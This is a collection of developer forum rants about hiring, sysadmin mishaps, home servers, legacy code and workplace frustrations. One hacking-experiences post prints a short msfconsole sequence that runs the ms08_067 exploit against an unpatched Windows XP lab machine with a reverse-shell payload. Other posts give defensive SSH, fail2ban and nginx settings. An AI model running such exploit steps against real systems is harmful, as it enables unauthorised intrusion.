Was lead developer at a small startup; I was hiring and had a budget to add 3 new people to my team to develop a new product for the company.
Some context first and then the rant!
Candidate 1 - Amazing, a dev I worked with before who was underutilized at the previous company. Still a junior, but she was a quick learner and eager to expand her knowledge; never an issue.
Candidate 2 - Kickass dev with back-end skills and extras; he was always eager to work a bit more than what was expected. I used to send him home early to annoy him. haha!
Candidate 3 - Let's call him P.
In the interview he answers every question perfectly, asks all the right questions and suggests some things I hadn't even thought of. The CTO goes ahead and says we should skip the technical test and just hire the guy - he's smart and knows what he's talking about - so I agree and we hire him. (We were a bit desperate at this stage as well.)
He comes in a week early to pick up his work laptop to get set up before he starts the next week. Awesome! This guy is going to be an asset to the company, can't wait to have him join the team. The CTO at this stage is getting ready to leave the company, and I will be taking over the division and need someone to take over the lead position; he seems like the guy to do it.
The guy starts the next week. He comes in, and the laptop we gave him is now a local server for testing; he will be working off his own laptop. No issue - we are small, so we needed a testing stack - though it wasn't really needed, since we had procedures in place for this already.
Here is where everything goes wrong!!! First day goes great... Next day he gets in early, 6:30am (Nice! NO!), and he absolutely smells - no, stinks - of weed. Not a light smell; the entire fucking office smells of weed! (I have no problem with weed, just don't make it my problem to deal with.) I get called by the boss and told to sort this out, people are complaining! I drive to the office and have a meeting with him; he says it's all good, he understands. (This was Friday.)
Monday comes around - Get a call from the boss at 7:30am. The whole office smells like weed; please talk to P again, this cannot happen again. I drive to the office again, and he again says it won't happen again; he has some issues with back pain and the weed helps.
Tuesday - Same fucking thing! And now he doesn't want to sign for the laptop ("server") that was given to him, and has moved to code in the boardroom, WHERE OUR FUCKING CLIENTS WILL BE VIEWING A DEMO OF THE PRODUCT THAT DAY!! Now that whole room smells like weed too. FML!
Wednesday - We send P a formal letter that he is under probation; P calls me to have a meeting. In the meeting he blames me for not understanding "new age" medicine. I ask for his doctor's prescription, and ask why he didn't tell me about this in the interview so I could make arrangements - we don't care if you are stoned, just do good work and be considerate to your co-workers. P can't provide these and keeps ranting. I suggest he take painkillers; he'll have none of it - only "new age" medicine for him.
Thursday - I ask him to rather "work" from home till we can get this sorted; he comes in for code reviews for 2 weeks. I can clearly see he has no idea how the system works, but he is trying, so I thought I'd dive deeper and look at all of his code. It's a mess; nothing makes sense, and 50% of it is hardcoded. (We are building a decentralized API for huge data sets, so this makes no sense.)
Friday - In the code review I confront him about this. He has excuses for everything, so I start asking him harder questions about the project and ask him to explain what we are building - he goes quiet and quits on the spot with a shitty apology.
From what I could make out, he was really smart when it came to theory, but translating the theory into actual practice wasn't possible for him. It probably would have been easier if he wasn't high all the time.
I hate interview code tests, but I learned a valuable lesson that day! Always test for some code knowledge as well, even if you hate doing it; ask the right questions and be careful who you hire! You can only bullshit for so long in coding before someone figures out that you are a fraud.
-
Hacking/attack experiences...
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 hour (finding a good exploit took some time; got to root level easily afterwards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux (RHEL-based systems): Still not exploited. SELinux is powerful, motherfucker.
Keep in mind that I had a great pentesting setup back then 😊. I don't have one, nor do I do that, anymore, since I love defensive security more nowadays and simply don't have the time.
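For anyone wondering what a five-second XP pop looks like in practice, a classic msfconsole session against an unpatched lab box goes roughly like this (a sketch only - I don't know which exploits were actually used above; ms08_067 is just the textbook XP example, and the IPs are made up):

    msfconsole
    use exploit/windows/smb/ms08_067_netapi     # the textbook unpatched-XP SMB hole
    set RHOST 192.168.56.101                    # lab victim
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.56.1                      # attacker box
    exploit                                     # SYSTEM shell in seconds if vulnerable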
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including VPSes and dedis), so I get the usual amount of SSH brute force attacks (thanks for keeping me safe, CSF!), which is about 40-50K every hour. Those IPs automatically get blocked after three failed attempts within 5 minutes. No root login allowed + RSA key login with freaking strong passwords/passphrases.
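For reference, the no-root-login, key-only part of that setup boils down to a handful of sshd_config lines; a minimal sketch, assuming a stock Debian/Ubuntu layout:

    # /etc/ssh/sshd_config - relevant lines only
    PermitRootLogin no            # no direct root logins
    PasswordAuthentication no     # key-only auth, nothing for brute forcers to guess
    PubkeyAuthentication yes
    MaxAuthTries 3                # fewer guesses per connection

    # apply without dropping existing sessions
    sudo systemctl reload ssh     # the service is named sshd on some distros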
linu.xxx/much-security.nl - All kinds of attacks: application attacks, brute force, sometimes DDoS, but that is mostly mitigated at the provider level, to name a few. So, except for my own tests and a few DDoSes on both those domains, nothing really threatening (as in, nothing seems to have fucked anything up yet).
How did I discover that two of my servers had been hacked through brute forcers while no brute force protection was in place yet? I installed a barebones Ubuntu server onto both; they only come with system-default applications. Tried installing Nginx the next day - port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running, and thought I'd run it for fun even though I knew I hadn't installed it and it didn't come with the distro. It was actually running. Checked the auth logs and saw successful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any IP address which had three failed SSH logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned IP addresses - holy fuck, no wonder I got hacked!
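The ban rule from this story (three failed SSH logins within 5 minutes) maps to a jail.local roughly like this, together with the checks mentioned above; a sketch assuming default Debian/Ubuntu paths, and the ban time is a guess since the rant doesn't say:

    # /etc/fail2ban/jail.local
    [sshd]
    enabled  = yes
    maxretry = 3       # three failed logins...
    findtime = 300     # ...within 5 minutes...
    bantime  = 3600    # ...earns an hour-long ban (assumed value)

    # the checks from the story
    pidof apache2                       # should print nothing on a clean box
    grep 'Accepted' /var/log/auth.log   # successful logins, root included
    sudo iptables -L -n                 # banned IPs show up as REJECT/DROP rules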
One other kind of attack I get regularly, but if it doesn't get much worse, I'll deal with it :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN/DDoS attacks, for example (see the config sketch below).
System attacks: anti-brute-force software (Fail2Ban or CSF), anti-rootkit software, AppArmor or (which I prefer) SELinux, which actually catches quite a few web app attacks as well, and REGULARLY UPDATING THE SERVERS/SOFTWARE.
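The Nginx rate limiting part can be as small as this; a sketch with invented numbers, not anyone's real config. Note that true SYN floods are handled at the kernel/CSF level - Nginx only ever sees completed connections:

    # http block
    limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s;
    limit_conn_zone $binary_remote_addr zone=conns:10m;

    # server/location block
    location / {
        limit_req  zone=perip burst=20 nodelay;   # absorb short spikes, drop floods
        limit_conn conns 20;                      # cap parallel connections per IP
    }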
So yah, hereby :P
-
> installs devRant app on my iPhone
> too lazy to type my 18-char random password on mobile
> password manager app not on App Store yet
> dig up my old Macbook
> install XCode & homebrew package manager
> install 2 other package managers using homebrew
> install App deps from the 2 package managers
> query stackoverflow for why my deps fail to install
> open App in XCode
> setup Apple provisioning profile
> trust my certificate on my iPhone
> dig up an old router & setup a local WiFi network
> start a server on my laptop to serve my PGP keys
> download my PGP keys to my iPhone
> app crashes
> open an issue on github with steps to reproduce & stacktrace
...
> type my 18-char random password
> rant on how I wasted an entire afternoon
-
So, continuing the story, in reverse order, on the warship and its domain setup...
One day, the CO told me that we needed to set up a proper "network". Until then, the "network" was just an old Telcom switch and an online HDD. No DHCP, no nothing. The computers dropped to the default 169.254.0.0/16 link-local block of addresses, and the HDD was open to all - cute stuff. I did some research and presented him a few options. To start things off, and to show them that a proper setup is better and more functional, I set up a Linux server on one old PC.
The CO was reluctant to approve the money needed (as I have written before, budget constraints in the military are the stuff of nightmares; people there expect proper setups built with two toothpicks and a rubber band). So I employed the very principles I learned from the holy book, the Bastard Operator From Hell: terrorizing with intimidating-looking things. I showed him the Linux server, green letters on a black background, ngrep -x running (it spooks many people to be shown that). After some techno-babble I got approval for a proper rack server and new PCs. Then came the hard part: convincing him to ditch the old Telcom switch in favour of a new Cisco Catalyst one.
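About that ngrep trick: the terminal terror demo is a one-liner. Something like this fills the screen with live hex dumps of everything on the wire, which looks suitably arcane to the uninitiated (the interface name is an assumption):

    sudo ngrep -d eth0 -x '' tcp    # dump every TCP packet as hex + ASCII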
Three hours of non-stop barrage. Long papers of NATO specifications on security standards. Subliminal threats of security compromises. God, I never knew I would have to stoop so low. How little did I know that after that...
Came the horrors of user support.
Moral of the story: an old Greek saying goes "even a saint needs terrorizing". Keep that in mind.
-
TL;DR:
Wrote a slick scheduling and communication system allowing me to assign photography resources based on time and location.
I'll tell you a little secret ... I'm not actually a dev. I'm a photographer, pretending to be a dev.
Or ... perhaps it's the other way around? (I spend most of my time writing code these days, but only for me - I write the software I use to run my business).
I own a photography studio - we specialize in youth volleyball photography (mostly 12-18 year old girls with a bit of high school, college and semi-pro thrown in for good measure - it's a hugely popular sport) and travel all over the US (and sometimes Europe) photographing.
As a point of scale, this year we photographed a tournament in Denver that featured 100 volleyball courts (in one room!), playing at the same time.
I'm based in California and fly a crew of part-time staff around to these events, but my father and I drive our booth equipment wherever it needs to go. We usually set up a 30'x90' booth with local servers, download/processing/cashier computers and 45 laptops for viewing/ordering photographs. Not to mention 16' drape and banners, tons of samples, 55" TVs, etc. It's quite the production.
We photograph by paid signup only - when there are upwards of 800 teams/9,600 athletes per weekend playing, and you only have four trained photographers, you've got to manage your resources!
This of course means you have to have a system for taking those sign-ups, and for assigning teams to photographers in the most efficient manner possible based on who is available when each team is playing. (You can waste an awful lot of time walking from one court to another in a large convention center - especially if you have to navigate through large crowds - not to mention exhausting yourself.)
So this year I finally added a feature I've wanted for quite some time - an interactive court map. I can take an image of the court layout from the tournament and create an HTML version in our software. As I mouse over requests in one window, the corresponding court is highlighted on the map in another browser window. Each photographer has a color associated with them. When I assign requests to a photographer, the court is color coded with the color of the photographer. This allows me to group assignments to minimize photographer walk time and keep them in a specific area. It's also very easy to look at the map and see unassigned requests and look to see what photographer is nearby.
This year I also integrated with Twilio and set up a simple set of text shortcuts that photographers can use to let our booth staff know where they are, whether they have memory cards that need picking up, whether they need water/coffee/a snack, etc. They can also move assignments on their schedule or send an SOS for help if it looks like they aren't going to be able to photograph a team.
Kind of a CLI via the phone. :)
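The sending side of shortcuts like these is a single HTTP call to Twilio's REST API; a minimal sketch with curl - the SID, token and numbers are placeholders, and the real system presumably sits behind an inbound-SMS webhook that parses the shortcut first:

    curl -X POST "https://api.twilio.com/2010-04-01/Accounts/$TWILIO_SID/Messages.json" \
         -u "$TWILIO_SID:$TWILIO_TOKEN" \
         --data-urlencode "From=+15005550006" \
         --data-urlencode "To=+15005550001" \
         --data-urlencode "Body=Got it - runner heading your way with water"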
The additions have turned out to be really useful and have made scheduling and managing the photographers much easier than it was in the past.
-
I decided to set up a little server on my local network just to make use of a 2TB hard drive I use to store videos.
Told everyone in the house I planned to grow the library over time and that they could access it all in a browser using my system name. It's become quite a fun venture and my video library is shaping up nicely.
Using nginx on a Dell XPS 17 with Ubuntu 16.04 to host a server that just auto-indexes a shared directory on my external 2TB hard drive. Kind of an embarrassing rig, but it's just a hobby and I do plan to upgrade shit later.
The real fun has been getting to understand a bit more about video files. They used to be magic to me, as cryptic as their file extensions. Now I run a script on all of my torrents which checks the video and audio codecs, converting the files if they aren't supported by Chrome's and Firefox's web players and outputting mp4s using ffmpeg. I feel like I have this stuff down fairly well now. Becoming more and more automated.
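A codec-checking pass like that can be done with ffprobe + ffmpeg; a simplified sketch of the idea - not the actual script, and the paths and codec list are assumptions:

    #!/usr/bin/env bash
    # rewrap or transcode anything that isn't already browser-friendly h264/aac mp4
    for f in /data/torrents/*.mkv /data/torrents/*.avi; do
        [ -e "$f" ] || continue
        v=$(ffprobe -v error -select_streams v:0 -show_entries stream=codec_name -of csv=p=0 "$f")
        a=$(ffprobe -v error -select_streams a:0 -show_entries stream=codec_name -of csv=p=0 "$f")
        out="${f%.*}.mp4"
        if [ "$v" = h264 ] && [ "$a" = aac ]; then
            ffmpeg -n -i "$f" -c copy "$out"                  # container swap only
        else
            ffmpeg -n -i "$f" -c:v libx264 -c:a aac "$out"    # transcode the offenders
        fi
    done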
Next step is to port forward so I can access it from anywhere, but we'll see about that later down the line.
-
So we hired an intern, and his first task was to change a few things in an email layout for our client, which is an investment bank.
I told one of my developers to make a dump of his local database and set up the project for the intern. When the intern completed the task, my developer thought that the title "Dow Jones index crashed" was a pretty funny title for a test.
What he didn't think through enough is that he had forgotten to configure a fake SMTP server, and he had a production database dump with real email addresses.
I had a really awkward 20-minute conversation with our client. Fuck my life.
-
Trying to set up a local Overpass API and Nominatim server (OpenStreetMap data stuff).
The docker Overpass image has been downloading a 38GB file for a little more than an hour now, and it's getting closer and closer...
3..........
2............
1...............
100% YEAAAA.......
*docker continues to initiate the download of a new file*
"Hmm this can't be THAT bi......"
25gb
D:
Let's wait yet again..... I was so excited :(
-
Suddenly it hits me.
It’s 01:20 here, but I get it.
It’s ALL a budget thing.
No dedicated tester means less expenses.
No personal parking spot?
No expenses!
And no good staging or testing environment? Less expenses!
Meanwhile every developer can set up, work on, and maintain about 20 websites on their shitty local Windows machine, which doesn't even have a proper SSD installed, and we are setting impossible deadlines to figure out who will sink and who will swim.
Oh, here is an SSD... Figure out the installation yourself, because we have no IT knowledge or budget for people that do.
You want a challenge? How about 40 other people that are distracting you all day long.
Meanwhile everybody has to improve their skills in JS, React, HTML5, CSS3, Angular, .NET and Razor so money can be made faster.
It would be nice if you could build apps as well.
You had a question? Sorry, no time. Expect some feedback 14 days later.
You finished the site?
Great!
But here are 101 bugs to solve before next week.
All hail their crazy company!
-
I've found and fixed every kind of "bad bug" I can think of over my career, from allowing negative financial transfers to weird platform-specific behaviour. Here are a few of the more interesting ones that come to mind...
#1 - Most expensive lesson learned
Almost 10 years ago (while learning to code) I wrote a loyalty card system that ended up going national. Fast forward 2 years, and by some miracle the system still worked and had services running on 500+ POS servers in large retail stores, uploading thousands of transactions each second - so, to stay ahead of any trouble with this increased traffic, we decided to add a loadbalancer to our backend.
This was simply a matter of re-assigning the IP and would cause 10-15 minutes of downtime (for the first time ever). We made the switch and everything seemed perfect. Too perfect...
After 10 minutes every phone in the office started going berserk - calls were coming in about store servers irreparably crashing all over the country, taking all the tills offline and forcing stores to close their doors midday. It was bad, and we couldn't conceive how it could possibly be us or our software to blame.
Turns out we made the local service write any web service errors to a log file upon failure, for debugging purposes, before retrying - a perfectly sensible thing to do, if I hadn't forgotten to check the size of (or clear) the log file. In about 15 minutes of downtime, each store's error log proceeded to grow and consume every available byte of HD space before crashing Windows.
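The missing guard amounts to a couple of lines. The original service ran on Windows, but the same idea sketched in shell (path and size cap invented):

    LOG=/var/log/pos-sync/errors.log
    MAX=$((10 * 1024 * 1024))    # 10 MB cap

    log_error() {
        # truncate before the log can eat the whole disk
        [ -f "$LOG" ] && [ "$(stat -c%s "$LOG")" -gt "$MAX" ] && : > "$LOG"
        echo "$(date -Is) $*" >> "$LOG"
    }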
#2 - Hardest to find
This was a true "Nessie" bug.. We had a single codebase powering a few hundred sites. Every now and then at some point the web server would spontaneously die and vommit a bunch of sql statements and sensitive data back to the user causing huge concern but I could never remotely replicate the behaviour - until 4 years later it happened to one of our support staff and I could pull out their network & session info.
Turns out years back when the server was first setup each domain was added as an individual "Site" on IIS but shared the same root directory and hence the same session path. It would have remained unnoticed if we had not grown but as our traffic increased ever so often 2 users of different sites would end up sharing a session id causing the server to promptly implode on itself.
#3 - Most elegant fix
Same bastard IIS server as #2. The codebase was the most insecure, unstable travesty I've ever worked with - SQL injection vulns in EVERY URL, SQL statements stored in COOKIES... this thing was irreparably fucked up but had to stay online until it could be replaced. Basically every other day it got hit by bots and ended up sending blue-pill spam or mining shitcoin, and I would simply delete the instance and recreate it in a semi-un-compromised state, which was an acceptable uptime solution for the business... until we were DDoSed for 5 days straight.
My hands were tied and there was no way to mitigate it except stopping individual sites as they came under attack and starting them again after it subsided... (for some reason the attacks seemed to target by domain instead of IP). After 3 days of doing this manually I was given the go-ahead to use any resources necessary to make it stop, and especially since it was IIS6 I had no fucking clue where to start.
So I stuck to what I knew and deployed a $5 VM running an Nginx reverse proxy with heavy caching and rate limiting, linked to a custom fail2ban plugin, in front of the insecure server. The attacks died instantly, the server sped up 10x and was never compromised by bots again (presumably since they got back a Linux user agent). To this day I marvel at this miracle $5 fix.
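That $5 shield is reproducible with surprisingly little config; a stripped-down sketch of such a caching, rate-limiting reverse proxy, with invented addresses and limits:

    # http block
    proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=shield:50m inactive=10m;
    limit_req_zone $binary_remote_addr zone=flood:10m rate=5r/s;

    server {
        listen 80;
        location / {
            limit_req zone=flood burst=10 nodelay;
            proxy_cache shield;
            proxy_cache_valid 200 302 5m;       # serve hot pages from cache
            proxy_set_header Host $host;
            proxy_pass http://203.0.113.10;     # the wounded IIS6 box
        }
    }
-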
Thank you guys. Especially thank you @linuxxx. Because of your help, patience and advice I managed to set up and manage my new VPS on my own. I even moved to Linux on my local machine.
It has been a long path, but I feel confident now. Thank you for growing that feeling in me.
-
I showed a friend of mine a project I made in two days with Docker and Symfony PHP. It is a rather simple app, but it did involve my usual setup: Nginx with gzip/cache/security headers/SSL + a Redis caching DB + PHP-FPM for Symfony. I also used PHP 7.4 for the lolz.
He complained that he didn't like using Docker and would rather install dependencies with composer install and then run it with a Laravel command. He insisted that he wanted a non-Docker installation manual.
I advised him to first install Nginx and generate some self-signed certificates, then copy all the config files and replace any environment-injected values (I use a self-made shell script for this) with the environment values from the docker-compose files.
Then I told him to download PHP-FPM with PHP 7.4 alpha, install and configure all the extensions needed, download and set up a local Redis database, and at last re-implement a .env file, since I had removed those and replaced them with the container environment.
He sent an angry emoji back (in a funny way)
God bless containerized applications: so easy to spin up entire applications (either custom ones or vendor ones like Redis/MySQL) and throw them away after having played with them. No need to clutter up your own PC with runtime environments.
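For scale, a stack like the one described fits in a compose file about this size; a sketch, not the actual setup - image tags and paths are assumptions:

    # docker-compose.yml
    version: "3.7"
    services:
      nginx:
        image: nginx:alpine
        ports: ["443:443"]
        volumes:
          - ./docker/nginx.conf:/etc/nginx/nginx.conf:ro
          - ./docker/certs:/etc/nginx/certs:ro   # self-signed, local dev only
      php:
        image: php:7.4-rc-fpm                    # 7.4 was pre-release at the time
        volumes: ["./:/var/www/app"]
        environment:
          REDIS_HOST: redis                      # container env instead of .env files
      redis:
        image: redis:5-alpine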
I wonder if he relents :p
-
Ok so this happened over the last 3 days. I didn't post it till now because I seriously had to take a rest from all the bullshit and stress that came with it...
(Legacy project I have the lead on, called "Foo")
Monday:
Management decided it would be effective to add a senior and a junior to Foo, which would make it (together with me) 2 juniors and one senior developer.
Well, I spent most of that day helping both the junior and the senior set up "Foo" on their local development machines... so I could not do any programming myself.
Tuesday:
The senior wanted to refactor EVERYTHING... and I had to stop him multiple times, because we simply do not have the time to do that...
The junior tried to work on other things as much as he could, and after he had run out of things to do, asked me about EVERYTHING... EVEN WHERE TO FUCKING CHANGE SOME GOD DAMN STRINGS!...
Also, he did 3 commits in total, two of which consisted of my code (because I had to "help" him).
Wednesday:
Both the junior and the senior were removed from the project and I got another senior... who fucking deleted the production database by accident.
god damn, rough few days man...
-
A senior engineer with about 8 years of experience, in my team and company for almost a year now. Believe it or not, still hasn't set up a local dev environment.
Every time we ask this person to set it up / refer to the guide in Confluence / or just use the docker image, the person says ok.
Starts sending code for pull requests. The code would not even compile in most cases, just from a quick scan. When questioned how this was tested, the answer would be more or less 'oh my local setup is not working, could you test it out for me.'
Doesn't know how to write tests. Fairly recently, instead of storing string values in a list, (I swear I am not kidding) decided to come up with 20 string variables.
8 years plus experience! I think this is retarded even for a fresh grad.
-
This one's for all the SysAdmins out there.
About 4 years ago I was asked to take over systems administration for a dental office (~20 machines) after their previous guy had allowed their server's RAID 1 to fail and hadn't done any updates or general maintenance. (Please take note: this office is my parents' dental office.)
I have since been recovering from his poor configuration and setup by instituting an Active Directory environment and installing up-to-date software, as well as updating machines on the domain to Windows 10 since Windows 7 is no longer supported. I have also been properly licensing everything.
My bosses (my parents) are annoyed with this because "it's more expensive" and "it's too complicated, we don't know how to manage it", and I don't know how to explain to them that they aren't fucking systems admins. They asked why they could do it before, and I tried to explain that now it's secure and things need to be rolled out at the network level. They had every user running as full local admin on every workstation, plus the server.
Some people don't fucking understand that just because it's simple doesn't make it a good fucking idea. And because it's cheap doesn't mean it will always be (just wait till Microsoft audits you).
Oh, and they also don't understand fucking CAL licensing and refuse to pay for G Suite for all their staff who use it. Instead they just have two G Suite accounts and give everyone the fucking password.
I'm going to have an aneurysm
-
My current distraction is that I have found a local government surplus auction and I keep buying toys. This is my current distraction setup.
-
Our company maneuvered itself into a classic technical debt situation with a project from a second team of devs.
They then left, signing a maintenance contract, and now barely work on the project for exorbitant amounts of money.
Of course management got the idea to hand the project off to the first team, i.e. our team, even though we are not experts in that field and not familiar with the tech stack.
So after some time they asked for estimates on when we think we'll be able to implement new features for the project, and whom we need to hire to do so. The estimates returned are in the magnitude of years, even with specialists, and reality is currently hitting management hard.
The code is undocumented; there are several databases, several frontends and (sometimes) interfaces between these, all heavily woven into one another. A build is impossible, because only the previous devs had a working setup on their machines - over time packages were not updated and they just added local changes to keep going. A lot of shit does not conform to any practices; it's just, "ohh yeah, you have to go into that file and delete that line, and then in that other file change that hardcoded credential". A core platform is end-of-life and can be broken completely by one of the many frameworks it uses. In short, all knowledge is stowed away in the heads of those devs, and the codebase is a technical-debt-ridden pile of garbage.
Frankly, I am not even sure whom I am more mad at. Management has fucked up hard. They let people go until "they reached a critical mass" of crucial employees. Only they were past critical mass when they started making the jobs for team 2 unappealing, and they did not realize it - because how could they, they are not qualified to judge who is crucial.
However, the dev team also behaved like shitbags. They managed the whole project for years, and they a) actively excluded other devs from their project even though it was required by management, and b) left the codebase in a catastrophic state and said, "well, we were always stuffed with work, there was no time for maintenance and documentation".
Hey assholes. You were the managers on that project. Upper management has no qualification to understand technical debt. They kept asking for features, and you kept saying yes and hastily slapped them into the codebase, instead of giving proper time estimates which account for code quality, tests, reviews and documentation.
In the end team #2 was treated badly, so I kinda get their side. But up until the management change, which is relatively recent, they had fantastic management who absolutely would have let them take the time to account for quality when delivering features - and yet the code base looks like a river of diarrhea.
Frankly, fuck those guys.
Our management and our PM remain great, and the team is amazing. A couple of days a week we now look at this horrible mess of a codebase and try to decide whom to hire to help make it less broken. At least it seems management has accepted this reality, because they have now hired personnel qualified to understand the technical details, and because we did a technical analysis to provide those details.
Let's see how this whole thing goes.
-
Everyone was a noob once. I am the first to tell that to everyone. But there are limits.
Where I work we got a new colleague, fresh from college, with extensive knowledge of Ansible who knows his way around a Linux system... Or so he claims.
I desperately need some automation reinforcements, since the project requires a lot of work to be done.
I gave a half-day training on how to develop, starting from SSH key setup on the local machine: the project directory layout, the components, the designs, the scripts, everything...
I ask "Do you understand this?"
"Yes, I understand. " Was the reply.
I give a very simple task really. Just adapt get_url tasks in such a way that it accepts headers, of any kind.
It's literally a one line job.
A week passes by; today is the "deadline".
Nothing works. The guy confuses roles with playbooks, hardcodes secrets in roles, does not create inventory files for the specifications, has no playbooks, does everything on the testing machine itself, and abuses SSH keys from the controller node... It's a fucking mess.
Clearly he does not understand at all what he is doing.
Today he comes: "sorry, but I cannot finish it"
"Why not?" I ask.
"I get this error" sends a fucking screenshot. I see the fucking disaster setup in one shot ...
"You totally have not done the things like I taught you. Where are your commits and what are.your branch names?"
"Euuuh I don't have any"
Saywhatnow.jpeg
I get frustrated, but nonetheless I re-explain everything from top to bottom! I actually give him a working example of what he should do!
Me: "Do you understand now?"
Colleague: "Yes, I do understand now."
Me: "Are you sure you understand now?"
C: "yes I do"
Proceeds to do fucking shit all...
WHY FUCKING LIE ABOUT THE THINGS YOU DON'T UNDERSTAND??? WHAT KIND OF COGNITIVE MALFUNCTION IS HAPPENING IN YOUR HEAD THAT, EVEN GIVEN A WORKING EXAMPLE, YOU CAN'T REPLICATE IT???
WHY APPLY FOR A FUCKING JOB AND LIE ABOUT YOUR COMPETENCES WHEN YOU DON'T EVEN GET THE FUCKING BASICS!?!?
WHY WASTE MY FUCKING TIME?!?!?!
Told my "dear team leader" (see previous rants) that it's not okay to lie about that, we desperately need capable people and he does not seem to be one of them.
"Sorry about that NeatNerdPrime but be patient, he is still a junior"
YOU FUCKING HIRED THAT PERSON WITH FULL KNOWLEDGE ABOUT HAI RESUME AND ACCEPTED HIS WORDS AT FACE VALUE WITHOUT EVEN A PROPER TECHNICAL TEST. YOU PROMISED HE WAS CAPABLE AND HE IS FUCKING NOT, FUCK YOU AND YOUR PEOPLE MANAGEMENT SKILLS, YOU ALREADY FAIL AT THE START.
FUCK THIS. I WILL SLACK OFF TODAY BECAUSE WITHOUT ME THIS TEAM AND THIS PROJECT JUST CRUMBLES DOWN DUE TO SHEER INCOMPETENCE.5 -
My last job before going freelance. It started as a great startup, but as time passed and the company grew, it all went down the drain and turned into a pretty crappy culture.
Once one of the local "darling" startups, it's now widely known in the local community for low salaries and crazy employee churn.
Management sells this great "startup culture", but reality is wildly different. Not sure if management believes in what they are selling, or if they know they are selling BS.
- The recurring motto of "Work smarter, not harder" is the biggest BS of them all. Constant pressure to work unpaid overtime. Not overt, because that's illegal, but you face judgement if you don't comply, and you'll eventually see consequences like a lack of raises, or being passed over for promotions in favour of less competent people who are willing to comply.
- Expectation management is worse than non-existent. Worse, because they actively feed expectations they have no intention of delivering on (i.e., career progression, salary bumps and so on).
- Management is (rightfully) proud of hiring talented people, but then treats almost everyone like they're stupid.
- Feedback is consistently ignored.
- Senior people leave. Replace them with cheap juniors. Promote the few juniors that stay for more than 12 months to middle-management positions and wonder where things went wrong.
- People who rock the boat about the bad culture or the shitty stunts that management occasionally pulls get pushed out.
- Get everyone working overtime for a week to set up a venue for a large event, abroad, while you put everyone in bunk rooms at the cheapest hostel you could find and don't even cover all meal expenses. No staff hired to set up the venue, so this includes heavy lifting of all sorts. Fly them on the cheapest fares, ensuring nobody gets a direct flight and everyone has a good few hours of layover. Fly them on the weekend, to make sure nobody is "wasting time" travelling during work hours. Then call this a team-building event.
This is a tech recruitment company that makes a big fuss about how tech recruitment is broken and toxic...
Also, this is a company that wants to use ML and AI to match candidates to jobs and build a sophisticated product, and wanted a stronger "Engineering culture" not so long ago. Meanwhile:
- Engineering is shoved into the back seat. Major company and product decisions are made without input from anyone on the engineering side of things, including the product roadmaps.
- Product lead is an inexperienced kid with zero tech background -> Promote him to also manage the developers as part of the product team while getting rid of your tech lead.
- Dev team is essentially seen by management as an assembly line for features. Dev salaries are now well below market average, and they wonder why it's hard to recruit good devs. (Again, this is a tech recruitment company.)
-
My friend argues working on a remote desktop is better than working on a local setup! Where should I bang my head? ⚒️😭🙈
-
"four million dollars"
TL;DR. Seriously, it's way too long.
That's all the management really cares about, apparently.
It all started when there were heated, war-faced discussions with a major client this weekend (coonts, I tell ye), and it was decided that a stupid, out-of-context customisation POC that was hacked together by the "customisation and delivery" team (they know how to do neither) needed to be merged with the product (a hot, lumpy cluster fuck, made in a technology so old that even its great creators (namely Goo-fucking-gle) decided it was their worst mistake ever and stopped supporting it (or even considering its existence at this point)).
This morning, my manager calls me and announces that I'm the lucky fuck who gets to do this shit.
Now, being the de facto git admin of our team (after the last lead left, I was the only one with adequate experience), I suggested to my manager: "boss, here's a light bulb. Why don't we just create a new branch for the fuckers and ask them to merge their shite with our shite, and then all we'll have to do is build the mixed-up shite to create an even smellier pile of shite and feed it to the customer".
"I agree with you mahaDev (when haven't you said that, coont), but the thing is <insert random manager talk here>, so we're the ones who'll have to do it (again, when haven't you said that, coont)"
I said fine. Send me the details. He forwarded me a mail which contained context not amounting to half a syllable of the word "context". I pinged the guy who developed the hack. He gave me nothing but a link to his code repo. I said give me details. He simply said "I've sent the repo details, what else do you require?"
1st motherfucker.
Dafuq? Dude, gimme some spice. Dafuq you done? Dafuq libraries you used? Dafuq APIs you used? Where dafuq did you get this old-ass checkout on which you've made these changes? AND DAFUQ IS THIS TOOL SUPPOSED TO DO, AND HOW DOES IT AFFECT MY PRODUCT?
Anyway, since I didn't get a lot of info, I set about trying to just merge the code blindly and fix all conflicts, assuming that no new libraries/APIs had been used and the code was compatible with our master code base.
Enter delivery head. 2nd motherfucker.
This coont has neither the technical knowledge nor the common sense to ask someone who knows his shit to help out with the technical stuff.
I found out that this was the half-assed moron who agreed to a 3-day timeline (and our build takes around 13 hours to complete, end to end). Because fuck testing. They validated their tool, we've tested our product; there's no way it can fail when we make a hybrid cocktail that will make the elephant's foot look like a frikkin mojito!
Anywho, he comes by every half-motherfucking-hour and asks whether the build has been triggered.
Bitch. I have no clue what is going on, and your people apparently don't have the time to give a fuck. How in the world do you expect me to finish this in 5 minutes?
Anyway, when I compile for the first time after merging, I see enough compilation errors to last a frikkin lifetime. I kid you not, I scrolled for a complete minute before reaching the last one.
Again, my assumption was that there were no library or dependency changes; neither did I know that the dude had used completely different libraries altogether in some places.
Now I know it's my fault for not checking myself, but I was already having a bad day.
I then proceeded to have a little tantrum. In the middle of the floor, because I DIDN'T HAVE A CLUE WHAT CHANGES WERE MADE AND NOBODY CARED ENOUGH TO GIVE A FUCKING FUCK ABOUT THE DAMN FUCK.
